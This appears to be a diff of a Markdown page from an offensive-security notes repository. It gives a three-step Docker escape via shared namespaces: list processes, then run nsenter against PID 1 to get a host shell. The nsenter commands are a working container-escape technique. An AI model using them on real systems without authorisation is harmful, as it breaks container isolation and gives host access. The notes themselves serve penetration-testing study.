H3llKa1ser/B00t2R00t/Privilege Escalation/Docker Escapes/Shared Namespaces.md

+# Shared Namespaces

-# STEPS
+## STEPS

-### 1) ps aux to list processes
+### 1) List processes

+    ps aux

-### 2) If we detect anything interesting, we can invoke the command: nsenter --target 1 --mount sh or: nsenter --target 1 --mount --uts --ipc --net /bin/bash
+### 2) If we detect anything interesting, we can invoke the command:

+    nsenter --target 1 --mount sh or: nsenter --target 1 --mount --uts --ipc --net /bin/bash

 ### 3) If it worked, we escaped the container!